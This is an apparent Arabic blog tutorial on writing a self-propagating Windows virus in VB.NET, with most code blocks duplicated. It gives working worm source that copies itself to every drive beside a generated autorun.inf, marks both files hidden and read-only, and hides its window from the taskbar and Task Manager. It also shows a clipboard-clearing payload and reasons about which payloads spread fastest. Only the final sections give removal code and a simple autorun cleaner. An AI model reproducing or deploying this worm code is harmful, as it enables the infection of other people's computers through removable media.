لصناعة أي فايروس يتطلب الأتي :
1. كل فايروس لابد من وسيلة لتشغيله اما مع بدء تشغيل الحاسوب او عبر ملف اوتوران لكي يبدء بعمله
2. كيف نجعل هذا الفايروس يتكاثر من خلال استنساخ نفسه الى اقراص مرنة او صلبة
3. يجب ان لا يظهر اسم الفايروس بشريط المهام حتى لا يحس المستهدف بالفايروس بانه مصاب به (من خلال جعل خاصية=False show in taskbar الخاصة بالنافذة ويجب اخفائه من Task Manager
4. يجب ان نجعل الفايروس لا تظهر نافذته من خلال اخفائه (Formborderstyle=none)
وكتابه الكود التالي بحدث تحميل النافذة هذا الكود يحول لون Form الى ابيض وبعدها يقوم باخفاء أي لون ابيض في النافذة فتختفي Form كليا . او جعل خاصية عدم شفافية تساوي صفر(Me.Opacity = 0 ) أي نجعل النافذة شفافة جدا لدرجة لا تشاهد
Me.BackColor = Color.White
Me.TransparencyKey = Color.White 'or Me.Opacity = 0
5. الفكرة الاهم هي ماذا نريد من فايروسنا ان يعمل من خلاله نحدد هدف الفايروس بالاصابة.مثلا نريد فايروس يمنع عملية الاستنساخ داخل الحاسبة لابد ان نضيف Timer ونضع فيه كود افراغ Clipboard باستمرار حتى كلما نقوم بعملية استنساخ سوف يخزن البيانات داخل Clipboard وبواسطة برنامجنا نقوم بافراغها باستمرار
Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick
My.Computer.Clipboard.Clear()
End Sub
خطوات جعل فايروس ينتشر
برنامج انتشار الفايروس كامل
كيف نجعل الفايروس Virus ينتشر
نحن نعلم عند تشغيل اقراص CD لمجموعة برامج داخل الحاسوب سوف نلاحظ ان القرص يعمل تلقائيا وتظهر فورم مثلا مصممة من قبل شركة الاقراص تظهر فيها البرامج .
السؤال هنا كيف عمل برنامج تلقائيا من داخل القرص بمجرد ادخاله بالسواقة
ج/هو السبب وجود ملف اوتوران autorun.inf ذو امتداد .inf موجود في داخله كود لتشغيل البرنامج فبمجرد ادخال القرص داخل السواقة سوف يقوم نظام التشغيل OS بتشغيل كل ملف اوتوران داخل القرص وملف اوتوران بدوره يشغل البرنامج وكذالك ملفات اوتوران في فلاشات USB تعمل تلقائيا بمجرد ادخال فلاش.
اي ان ملف اوتوران اذا كان موجود في فلاش او قرص من اقراص الحاسبة HD سوف يعمل بمجرد فتح فلاش او قرص HD من اقراص الحاسبة اذا كان موجود بها
لذالك سنجعل فايروس ينتشر عن طريقة وضع نسخ منه على كل قرص مرن وصلب بالحاسبة وبجوار الفايروس ملف اوتوران أي عند فتح كل قرص مرن او صلب من اقراص الحاسبة سوف يعمل ملف اوتوران ويشغل البرنامج (Virus) والبرنامج(Virus) بدوره يستنسخ نفسه في كل قرص صلب وفلاش متصل بالحاسبة ويصنع ملف اوتوران بجوار كل ملف حتى يشغل (Virus) عند تصفح أي قرص حتى لا يكون الفايروس خامل
فعندما ينتقل الفايروس الى الفلاش فعند ربطه بحاسبة ثانية في اول لحظة سيعمل ملف اوتوران ويشغل بدوره الفايروس الذي يستنسخ نفسه الى جميع اقراص الحاسبة الجديدة
نحن نعلم عند تشغيل اقراص CD لمجموعة برامج داخل الحاسوب سوف نلاحظ ان القرص يعمل تلقائيا وتظهر فورم مثلا مصممة من قبل شركة الاقراص تظهر فيها البرامج .
السؤال هنا كيف عمل برنامج تلقائيا من داخل القرص بمجرد ادخاله بالسواقة
ج/هو السبب وجود ملف اوتوران autorun.inf ذو امتداد .inf موجود في داخله كود لتشغيل البرنامج فبمجرد ادخال القرص داخل السواقة سوف يقوم نظام التشغيل OS بتشغيل كل ملف اوتوران داخل القرص وملف اوتوران بدوره يشغل البرنامج وكذالك ملفات اوتوران في فلاشات USB تعمل تلقائيا بمجرد ادخال فلاش.
اي ان ملف اوتوران اذا كان موجود في فلاش او قرص من اقراص الحاسبة HD سوف يعمل بمجرد فتح فلاش او قرص HD من اقراص الحاسبة اذا كان موجود بها
لذالك سنجعل فايروس ينتشر عن طريقة وضع نسخ منه على كل قرص مرن وصلب بالحاسبة وبجوار الفايروس ملف اوتوران أي عند فتح كل قرص مرن او صلب من اقراص الحاسبة سوف يعمل ملف اوتوران ويشغل البرنامج (Virus) والبرنامج(Virus) بدوره يستنسخ نفسه في كل قرص صلب وفلاش متصل بالحاسبة ويصنع ملف اوتوران بجوار كل ملف حتى يشغل (Virus) عند تصفح أي قرص حتى لا يكون الفايروس خامل
فعندما ينتقل الفايروس الى الفلاش فعند ربطه بحاسبة ثانية في اول لحظة سيعمل ملف اوتوران ويشغل بدوره الفايروس الذي يستنسخ نفسه الى جميع اقراص الحاسبة الجديدة
الكود الموجود في داخل هذا الملف هو تشغيل برنامج اسمه test موجود بجوار ملف.؟
في برامج فايروس عندما نصنع فايروس يجب ان نفكر بسرعة انتشاره بواسطة ملف اوتوران
من خلال تحديد هدفه مثلا لو صنعنا فايروس يغلق الحاسوب باستمرار وجعلنا ينتشر بملف اوتوران نلاحظ بطئ انتشاره لان أي حاسبة تصاب لا ينتقل منها الى حاسبة اخرى لانها لا تعمل مجدد الا بعد اعادة تنصيبها من جديد ومسح فايروس في هذه الحالة الفايروس ينتشر فقط من فلاش مصاب به الى الحاسبة التي سنربطها به
اما في حالة صنع فايروس منع عملية نسخ ينتشر بملف اوتوران نلاحظ سرعة انتشاره لان الحاسبة التي تصاب لا تتوقف عن العمل من الممكن ان نربط بها فلاش وينتقل الفايروس به الى حاسبة اخرى
في برامج فايروس عندما نصنع فايروس يجب ان نفكر بسرعة انتشاره بواسطة ملف اوتوران
من خلال تحديد هدفه مثلا لو صنعنا فايروس يغلق الحاسوب باستمرار وجعلنا ينتشر بملف اوتوران نلاحظ بطئ انتشاره لان أي حاسبة تصاب لا ينتقل منها الى حاسبة اخرى لانها لا تعمل مجدد الا بعد اعادة تنصيبها من جديد ومسح فايروس في هذه الحالة الفايروس ينتشر فقط من فلاش مصاب به الى الحاسبة التي سنربطها به
اما في حالة صنع فايروس منع عملية نسخ ينتشر بملف اوتوران نلاحظ سرعة انتشاره لان الحاسبة التي تصاب لا تتوقف عن العمل من الممكن ان نربط بها فلاش وينتقل الفايروس به الى حاسبة اخرى
خطوات جعل فايروس ينتشر
1. نجلب جميع الأقراص الصلبة والمرنة الموجودة داخل الحاسبة ونحدد ايهم متوفر حتى نستطيع ان ننسخ الفايروس على كل قرص وبما اننا نتعامل مع الملفات ندرج مكتبة Imports System.IO
VB.net Code
Imports System.IO
On Error Resume Next
'جلب جميع السواقات في الجهاز
Dim drive() As DriveInfo = DriveInfo.GetDrives
'نشر الفايروس في الجهاز سواقة سواقة
For i = 0 To drive.Length - 1
'فحص هل الجهاز جاهز لعملية النسخ
If drive(i).IsReady Then
هنا ننفذ الكود الذي نريده
End If
Next
Imports System.IO
On Error Resume Next
'جلب جميع السواقات في الجهاز
Dim drive() As DriveInfo = DriveInfo.GetDrives
'نشر الفايروس في الجهاز سواقة سواقة
For i = 0 To drive.Length - 1
'فحص هل الجهاز جاهز لعملية النسخ
If drive(i).IsReady Then
هنا ننفذ الكود الذي نريده
End If
Next
2. اذا كان هناك ملف اوتوران يستخدمه فايروس اخر او نفس هذا الفايروس نحذفه لكننا لانستطيع حذفة مباشرة لانه قد يكون محمي من الحذف نلغي الحماية عنه باعادة SetAttributes الى FileAttributes.Normal ثم نقوم بحذف الفايروس هو والملف المشغل له
VB.net Code
'اذا الفايروس موجود نمسحه حتى نكون جديد
If File.Exists(drive(i).Name & "autorun.inf") = True Then
File.SetAttributes(drive(i).Name & "autorun.inf", FileAttributes.Normal)
File.Delete(drive(i).Name & "autorun.inf")
File.SetAttributes(drive(i).Name & "test.exe", FileAttributes.Normal)
File.Delete(drive(i).Name & "test.exe")
End If
'اذا الفايروس موجود نمسحه حتى نكون جديد
If File.Exists(drive(i).Name & "autorun.inf") = True Then
File.SetAttributes(drive(i).Name & "autorun.inf", FileAttributes.Normal)
File.Delete(drive(i).Name & "autorun.inf")
File.SetAttributes(drive(i).Name & "test.exe", FileAttributes.Normal)
File.Delete(drive(i).Name & "test.exe")
End If
3. نكون ملف اوتوران الخاص بالفايروس في كل قرص ونكتب به كود تشغيل الفايروس الذي سميناه test نلاحظ اننا عندما انشئنا ملف اوتوران جعلنا امتداده .inf
VB.net Code
Dim objWriter As New StreamWriter(drive(i).Name & "autorun.inf")
objWriter.WriteLine("[autorun]")
objWriter.WriteLine("Shellexecute = test.exe")
objWriter.Close()
Dim objWriter As New StreamWriter(drive(i).Name & "autorun.inf")
objWriter.WriteLine("[autorun]")
objWriter.WriteLine("Shellexecute = test.exe")
objWriter.Close()
4. ننسخ الفايروس الى القرص ونجعل الفايروس وملف اوتوران مخفيات وغير قابلات للحذف
VB.net Code
'ننسخ الفايروس مع الاوتوران
File.Copy(Application.StartupPath & "\WindowsApplication19.exe", drive(i).Name & "test.exe")
'جعل الفايروس والملف المشغل له مخفي وللقرائة فقط
File.SetAttributes(drive(i).Name & "test.exe", FileAttributes.Hidden + FileAttributes.ReadOnly)
File.SetAttributes(drive(i).Name & "autorun.inf", FileAttributes.Hidden + FileAttributes.ReadOnly)
'ننسخ الفايروس مع الاوتوران
File.Copy(Application.StartupPath & "\WindowsApplication19.exe", drive(i).Name & "test.exe")
'جعل الفايروس والملف المشغل له مخفي وللقرائة فقط
File.SetAttributes(drive(i).Name & "test.exe", FileAttributes.Hidden + FileAttributes.ReadOnly)
File.SetAttributes(drive(i).Name & "autorun.inf", FileAttributes.Hidden + FileAttributes.ReadOnly)
برنامج انتشار الفايروس كامل
VB.net Code
Imports System.IO
Public Class Form1
Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
On Error Resume Next
'جلب جميع السواقات في الجهاز
Dim drive() As DriveInfo = DriveInfo.GetDrives
'نشر الفايروس في الجهاز سواقة سواقة
For i = 0 To drive.Length - 1
'فحص هل الجهاز جاهز لعملية النسخ
If drive(i).IsReady Then
'اذا الفايروس موجود نمسحه حتى نكون جديد
If File.Exists(drive(i).Name & "autorun.inf") = True Then
File.Delete(drive(i).Name & "autorun.inf")
File.Delete(drive(i).Name & "test.exe")
End If
' File.CreateText(drive(i).Name & "test.exe")
'نكون ملف اوتو ران مرفق للفايروس
Dim objWriter As New StreamWriter(drive(i).Name & "autorun.inf")
objWriter.WriteLine("[autorun]")
objWriter.WriteLine("Shellexecute = test.exe")
objWriter.Close()
'ننسخ الفايروس مع الاوتوران
File.Copy(Application.StartupPath & "\WindowsApplication19.exe", drive(i).Name & "test.exe")
'جعل الفايروس والملف المشغل له مخفي وللقرائة فقط
File.SetAttributes(drive(i).Name & "test.exe", FileAttributes.Hidden + FileAttributes.ReadOnly)
File.SetAttributes(drive(i).Name & "autorun.inf", FileAttributes.Hidden + FileAttributes.ReadOnly)
End If
Next
End Sub
Imports System.IO
Public Class Form1
Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
On Error Resume Next
'جلب جميع السواقات في الجهاز
Dim drive() As DriveInfo = DriveInfo.GetDrives
'نشر الفايروس في الجهاز سواقة سواقة
For i = 0 To drive.Length - 1
'فحص هل الجهاز جاهز لعملية النسخ
If drive(i).IsReady Then
'اذا الفايروس موجود نمسحه حتى نكون جديد
If File.Exists(drive(i).Name & "autorun.inf") = True Then
File.Delete(drive(i).Name & "autorun.inf")
File.Delete(drive(i).Name & "test.exe")
End If
' File.CreateText(drive(i).Name & "test.exe")
'نكون ملف اوتو ران مرفق للفايروس
Dim objWriter As New StreamWriter(drive(i).Name & "autorun.inf")
objWriter.WriteLine("[autorun]")
objWriter.WriteLine("Shellexecute = test.exe")
objWriter.Close()
'ننسخ الفايروس مع الاوتوران
File.Copy(Application.StartupPath & "\WindowsApplication19.exe", drive(i).Name & "test.exe")
'جعل الفايروس والملف المشغل له مخفي وللقرائة فقط
File.SetAttributes(drive(i).Name & "test.exe", FileAttributes.Hidden + FileAttributes.ReadOnly)
File.SetAttributes(drive(i).Name & "autorun.inf", FileAttributes.Hidden + FileAttributes.ReadOnly)
End If
Next
End Sub
End Class
بقي فقط نضيف للكود هدف هذا الفايروس او العملية التي نريده ان ينفذها ونربط فلاش بالحاسوب ونشغله سينتقل تلقائيا الى الفلاش ومنه الى بقية الحواسيب وعند كل عملية تشغيل لفلاش مصاب او فتح Drive قرص HD في حاسبة مصابة سينفذ عمله وينتشر
القضاء على الفايروس بنفس طريقة بنائه فقط نحذفه من كل مكان قمنا باضافته به ونستطيع ان نحذف فقط ملف الاوتوران فيصبح الفايروس مشلول لا يعمل ابد او نحذف فايروس ونبقى الاوتوران مشلول
VB.net Code
Imports System.IO
Public Class Form1
Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
On Error Resume Next
'جلب جميع السواقات في الجهاز
Dim drive() As DriveInfo = DriveInfo.GetDrives
'نشر الفايروس في الجهاز سواقة سواقة
For i = 0 To drive.Length - 1
'فحص هل الجهاز جاهز لعملية النسخ
If drive(i).IsReady Then
'اذا الفايروس موجود نمسحه حتى نكون جديد
If File.Exists(drive(i).Name & "autorun.inf") = True Then
‘نرفع خاصية الاخفاء والحماية من الفايروس حتى نستطيع حذفه
File.SetAttributes(drive(i).Name & "autorun.inf", FileAttributes.Normal)
File.Delete(drive(i).Name & "autorun.inf")
File.SetAttributes(drive(i).Name & "test.exe", FileAttributes.Normal)
File.Delete(drive(i).Name & "test.exe")
End If
End If
Next
End Sub
End Class
Imports System.IO
Public Class Form1
Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
On Error Resume Next
'جلب جميع السواقات في الجهاز
Dim drive() As DriveInfo = DriveInfo.GetDrives
'نشر الفايروس في الجهاز سواقة سواقة
For i = 0 To drive.Length - 1
'فحص هل الجهاز جاهز لعملية النسخ
If drive(i).IsReady Then
'اذا الفايروس موجود نمسحه حتى نكون جديد
If File.Exists(drive(i).Name & "autorun.inf") = True Then
‘نرفع خاصية الاخفاء والحماية من الفايروس حتى نستطيع حذفه
File.SetAttributes(drive(i).Name & "autorun.inf", FileAttributes.Normal)
File.Delete(drive(i).Name & "autorun.inf")
File.SetAttributes(drive(i).Name & "test.exe", FileAttributes.Normal)
File.Delete(drive(i).Name & "test.exe")
End If
End If
Next
End Sub
End Class
معلومة: لحذف كل فايروس اوتوران في الحاسبة نقرء محتوى ملفات الاتوران الموجودة في واجهة الاقراص الصلبة والمرنة و عندما نصل الى سطر shellexecute ناخذ اسم البرنامج بعد علامة (=) ونحذف البرنامج المسمى بهذا الاسم ؟لكن هذه الطريقة ستحذف حتى ملفات تشغيل لبعض البرامج الخاص كمشغلات لبعض البرامج المهمة
القضاء على فايروس الاوتوران عن طريق قرائة كل ملف اوتوران في مناطق التشغيل التلقائي
القضاء على فايروس الاوتوران عن طريق قرائة كل ملف اوتوران في مناطق التشغيل التلقائي
من اقراص صلبة وفلاشات ومسح الفايروس الذي يشغله هذا الملف (وهذا الطريقة ذات مساوئ ابحث عن السبب) وهذه طريقة تبين لك كيف يعمل انتي فايروس
VB.net Code
Imports System.IO
Public Class Form1
Dim lineread As String
Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
On Error Resume Next
'جلب جميع السواقات في الجهاز
Dim drive() As DriveInfo = DriveInfo.GetDrives
'نشر الفايروس في الجهاز سواقة سواقة
For i = 0 To drive.Length - 1
'فحص هل الجهاز جاهز لعملية النسخ
If drive(i).IsReady Then
'اذا الفايروس موجود نمسحه حتى نكون جديد
If File.Exists(drive(i).Name & "autorun.inf") = True Then
Dim objWriter As New StreamReader(drive(i).Name & "autorun.inf")
While objWriter.EndOfStream = False
lineread = objWriter.ReadLine()
If String.Equals(Mid(lineread, 1, 12), "Shellexecute") Then
Dim virusname() As String = Split(lineread, "=")
MsgBox("virusname=" & virusname(1))
If File.Exists(drive(i).Name & Trim(virusname(1))) = True Then
'نرفع خاصية الاخفاء والحماية من الفايروس حتى نستطيع حذفه
File.SetAttributes(drive(i).Name & Trim(virusname(1)), FileAttributes.Normal)
File.Delete(drive(i).Name & Trim(virusname(1)))
End If
End If
End While
objWriter.Close()
End If
End If
Next
End Sub
End Class
Imports System.IO
Public Class Form1
Dim lineread As String
Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
On Error Resume Next
'جلب جميع السواقات في الجهاز
Dim drive() As DriveInfo = DriveInfo.GetDrives
'نشر الفايروس في الجهاز سواقة سواقة
For i = 0 To drive.Length - 1
'فحص هل الجهاز جاهز لعملية النسخ
If drive(i).IsReady Then
'اذا الفايروس موجود نمسحه حتى نكون جديد
If File.Exists(drive(i).Name & "autorun.inf") = True Then
Dim objWriter As New StreamReader(drive(i).Name & "autorun.inf")
While objWriter.EndOfStream = False
lineread = objWriter.ReadLine()
If String.Equals(Mid(lineread, 1, 12), "Shellexecute") Then
Dim virusname() As String = Split(lineread, "=")
MsgBox("virusname=" & virusname(1))
If File.Exists(drive(i).Name & Trim(virusname(1))) = True Then
'نرفع خاصية الاخفاء والحماية من الفايروس حتى نستطيع حذفه
File.SetAttributes(drive(i).Name & Trim(virusname(1)), FileAttributes.Normal)
File.Delete(drive(i).Name & Trim(virusname(1)))
End If
End If
End While
objWriter.Close()
End If
End If
Next
End Sub
End Class
ليست هناك تعليقات:
إرسال تعليق